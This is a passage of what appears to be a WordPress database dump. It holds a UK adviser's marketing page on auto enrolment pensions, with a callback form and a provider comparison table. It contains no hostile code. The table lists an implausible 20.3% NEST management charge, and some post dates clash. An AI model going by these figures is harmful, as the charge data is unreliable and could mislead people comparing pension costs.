iphorm-element-wrap-select iphorm_10_7-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-select iphorm_10_7-element-spacer\">&#13;\n                    <label for=\"iphorm_10_7_52fe0ecf2f887\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                What Would You Like To Discuss                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-select iphorm_10_7-input-wrap\">&#13;\n            <select class=\"iphorm-element-select  iphorm_10_7\" name=\"iphorm_10_7\" id=\"iphorm_10_7_52fe0ecf2f887\"><option value=\"Auto Enrolment\">Auto Enrolment</option><option value=\"Pensions Advice\">Pensions Advice</option><option value=\"Other\">Other</option></select></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-select iphorm_10_6-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-select iphorm_10_6-element-spacer\">&#13;\n                    <label for=\"iphorm_10_6_52fe0ecf2f887\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Best Time To Call                                             </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-select iphorm_10_6-input-wrap\">&#13;\n            <select class=\"iphorm-element-select  iphorm_10_6\" name=\"iphorm_10_6\" id=\"iphorm_10_6_52fe0ecf2f887\"><option value=\"Morning\">Morning</option><option value=\"Afternoon\">Afternoon</option><option value=\"Evening\">Evening</option></select></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_10_8-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_10_8-element-spacer\">&#13;\n                    <label for=\"iphorm_10_8_52fe0ecf2f887\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Your Message                                             </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_10_8-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_10_8\" id=\"iphorm_10_8_52fe0ecf2f887\" name=\"iphorm_10_8\" style=\"background-color: rgb(255, 255, 255);color: rgb(235, 235, 235);\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_10_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-10 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-10\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\" style=\"font-size: 18px;\"><span style=\"padding-top: 15px;padding-bottom: 15px;padding-right: 10px;padding-left: 27px;background: rgb(255, 165, 0);\"><em style=\"color: rgb(0, 0, 0);\">Click to Request a Call Back, Its Free</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-52fe0ecf2f887 script\').remove();\r\n	//-->\r\n	]]></script></form></div>&#13;\n<p><span/></p></div><div class=\"clearboth\"/></span></p>&#13;\n<div class=\"title\"><h2>We Compare All The Leading Auto Enrolment Providers</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n<div class=\"related-posts related-projects clientslider-container\"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2012/06/nest_logo.gif\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2012/06/People-pension-22.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2012/06/now-pension2.png\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/axa.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: xx-large;\">Auto Enrolment Pensions – Take Our Advice</span></p>&#13;\n<p style=\"text-align: center;\">Equity SMART don’t just work FOR you – we work WITH you and AROUND you too. That’s why our Auto Enrolment consultancy service is FLEXIBLE and TAILORED so that you can pick and choose what advice suits YOU and YOUR NEEDS.</p>&#13;\n<p style=\"text-align: center;\">So what do you need from us? Take AS MUCH or AS LITTLE as you need…</p>&#13;\n</div></div>&#13;\n<div class=\"fullwidth-box\" style=\"background-color:;background-image:url(/wp-content/uploads/2013/09/Auto-Enrol.jpg);background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:25px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p> </p>&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#f4f4f4 !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#fff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-3\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Workforce Assessment</h2></div><div class=\"col-content-container \">We’ll assess your staff ahead of the Staging Date and prepare a <b>detailed report</b>. This will give you the <b>clearest possible picture</b> of where you currently stand for Auto Enrolment while giving you an idea of <b>costs</b>. We’ll also <b>project</b> them all the way up to 2018 when the full Auto Enrolment contributions take effect.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Payroll</h2></div><div class=\"col-content-container \">You’ll need to discuss all <b>payroll issues</b> to ensure your scheme complies. So let us provide you with good, <b>easy to follow</b> payroll advice. That way you’re covered for all eventualities regarding such factors as refunds, contribution pay periods and the necessary correspondence and record keeping for opt ins and opt outs.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Postponement Options</h2></div><div class=\"col-content-container \">Avoid tricky issues regarding gathering <b>contributions and refunds</b> for <b>opt outs </b>by getting Postponement advice from us. We’ll tell you <b>how it can be used</b> across different categories of worker.</div></article></section><style type=\"text/css\"><![CDATA[\r\n		#content-boxes-2 article.col{background-color:#f4f4f4 !important;}\r\n		#content-boxes-2 .fontawesome-icon.circle-yes{color:#fff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-3\" id=\"content-boxes-2\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Employee Communications</h2></div><div class=\"col-content-container \">We’ll keep <b>your employees</b> very much <b>in the picture</b> when it comes to Auto Enrolment. We’ll convey the right information to the right people, keeping it <b>relevant</b>, <b>timely </b>and<b> useful</b>.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Scheme Selection</h2></div><div class=\"col-content-container \">Our  Independent Financial Advisers, we will offer advice on the design of the scheme covering: contributions levels at the outset, from 2017 and from 2018 based on the statutory requirements.The definition of salary based on Earnings Definition, Auto Enrolment definitions  in line with existing scheme , Qualifying Band Earnings and a number of other key areas.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-thumbs-up\"/><h2>Scheme Implementation</h2></div><div class=\"col-content-container \">We’ll help you to get your chosen scheme <b>up and running</b> and then ensure that everything moves along in a way that is both <b>smooth and compliant</b>.</div></article></section><style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f9f9f9 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>If you’d like to discuss your options further – then talk to us.</h2><p>We’ve got all the information you need to ensure that you make the right choice when it comes to Auto Enrolment Pensions. Click the button or call today on .</p><a href=\"/contact-us\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n<p/></div></div><div class=\"fullwidth-box\" style=\"background-color:;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:0px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n<p><span><div class=\"one_half\"><style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>Auto Enrolment Advice - Times are Changing!</h2><p><b>There have been big changes to how Auto Enrolment Pension advice is now paid for - </b>Up until very recently, fees for advice were taken from the individual’s pension fund – but this has now been banned by the government, which is great news for the investor. As a result, it is the employers themselves that will have to pay for any advice in connection with Auto Enrolment, including the setting up and implementation of the pension scheme.</p>&#13;\n<p> </p>&#13;\n<p><span><b>We help select the right Auto Enrolment Pension scheme for YOU. </b>Equity SMART are ahead of the game and up to date with the changes. Our Consultancy Service is ready for companies to take as much or as little advice as they feel they need and we will also be able to put in place – where possible – a group personal pension scheme through a life company, or a pension scheme from NOW Pensions, The People’s Pension or NEST, depending on the best solution for the client.</span></p></section></div></div></span></p>&#13;\n<div class=\"one_half last\">&#13;\n<h2>Act Now and Claim Your Exclusive Auto Enrolment Pensions Report</h2>&#13;\n<p>Like most companies you’re probably aware of Auto Enrolment Pensions but aren’t exactly sure how or why it’s relevant to you?</p>&#13;\n<p>Then claim your online &amp; tailored auto enrolment pension report today.</p>&#13;\n<p>Specific to your business your report will provide you with all the facts you need to know about, and take you from confusion to clarity in 5 easy steps.</p>&#13;\n<p>Our FREE report will show you:<img class=\"alignright size-thumbnail wp-image-2077\" alt=\"ross3d5555\" src=\"/wp-content/uploads/2013/02/ross3d55551-150x150.png\" width=\"150\" height=\"150\"/></p>&#13;\n<style type=\"text/css\"><![CDATA[\r\n	.post-content #checklist-2 li:before{color:light !important;  }\r\n	.rtl .post-content #checklist-2 li:after{color:light !important;  }\r\n	]]></style><ul id=\"checklist-2\" class=\"list-icon circle-yes or no list-icon-arrow\"><li>When the changes affect you.</li>&#13;\n<li>What you need to do.</li>&#13;\n<li>What will happen if you do nothing.</li>&#13;\n<li>How we can help you.</li>&#13;\n</ul><a class=\"button large green\" href=\"/contact-us\" target=\"\">Click Here To Request Your FREE Report</a></div><div class=\"clearboth\"/><div class=\"alert error\"><div class=\"msg\">DID YOU KNOW: All employers with one worker or more are now required to enrol eligible jobholders into a workplace pension scheme, and also make an employer contribution? This is known as automatic enrolment and is the first time employers have been required by law to contribute to their workers’ pensions. Employers need to choose a pension scheme that meets certain Government standards. To qualify, minimum contributions must be made into the scheme.</div><a href=\"#\" class=\"toggle-alert\">Toggle</a></div>&#13;\n<p> </p>&#13;\n<div class=\"title\"><h2>Auto Enrolment – What are the Options?</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n<p><b>It all depends on what is right and relevant for you and your company. </b>To decide whether to go for a group pension scheme with a life company, or a pension scheme from NOW Pensions, The People’s Pension or NEST (the National Employment Savings Trust) you need to know what suits you best. Here are a few points of comparison to take into consideration.</p>&#13;\n<div class=\"table-1\">&#13;\n<table width=\"100%\"><thead><tr><th style=\"text-align: center;\"/>&#13;\n<th style=\"text-align: center;\">Life Company</th>&#13;\n<th style=\"text-align: center;\">NOW Pensions</th>&#13;\n<th>The People’s Pension</th>&#13;\n<th style=\"text-align: center;\">NEST</th>&#13;\n</tr></thead><tbody><tr><td style=\"text-align: center;\">Charges</td>&#13;\n<td style=\"text-align: center;\">Usually about 1% annual management charge</td>&#13;\n<td style=\"text-align: center;\">£1.50 per contribution per month plus 0.3% annual management charge</td>&#13;\n<td style=\"text-align: center;\">0.5% annual management charge</td>&#13;\n<td style=\"text-align: center;\">20.3% annual management charge plus 1.8% contribution charge</td>&#13;\n</tr><tr><td style=\"text-align: center;\">Investment</td>&#13;\n<td style=\"text-align: center;\">Full range of Funds</td>&#13;\n<td style=\"text-align: center;\">A <b>single</b> investment choice (Diversified Growth Fund)</td>&#13;\n<td style=\"text-align: center;\">Outsourced to L&amp;G offering 3 risk profiles</td>&#13;\n<td style=\"text-align: center;\">Target Fund which is outsourced</td>&#13;\n</tr><tr><td style=\"text-align: center;\">Charging Structure</td>&#13;\n<td style=\"text-align: center;\">Fair and set charging Structure</td>&#13;\n<td style=\"text-align: center;\">Varying charges which is not consistent with ‘treating Customers fairly’.</td>&#13;\n<td style=\"text-align: center;\">Lowest charging structure</td>&#13;\n<td style=\"text-align: center;\">Set charges but the highest in order to recoup Government set-up loans</td>&#13;\n</tr><tr><td style=\"text-align: center;\">Administration</td>&#13;\n<td style=\"text-align: center;\">In-house</td>&#13;\n<td style=\"text-align: center;\">Outsourced to Xafinity</td>&#13;\n<td style=\"text-align: center;\">In-house</td>&#13;\n<td style=\"text-align: center;\">Outsourced to TATA Consultancy Service</td>&#13;\n</tr></tbody></table></div>&#13;\n<p> </p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-3 .tagline-shadow:before,#reading-box-container-3 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-3\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f9f9f9 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>If you’d like to discuss your options further – then talk to us.</h2><p>We’ve got all the information you need to ensure that you make the right choice when it comes to Auto Enrolment Pensions. Click the button or call today on .</p><a href=\"/contact-us\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div></div></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Auto Enrolment Pensions Advice, Information &amp; FREE Report','Your busy! That\'s why we\'ve made our AUTO ENROLMENT pensions advice simple, clear & straightforward, saving you time, effort and expense.','publish','closed','closed','','auto-enrolment-pensions-advice-information-free-report','','','2017-09-21 16:34:26','2017-09-21 16:34:26','',0,'http://www.equalitywalk.org.uk/auto-enrolment-pensions-advice-information-free-report',0,'page','',0),(51,1,'2017-09-21 16:34:26','2017-09-21 16:34:26','<body class=\"page page-id-1880 page-template page-template-full-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-1880 current_page_item menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a 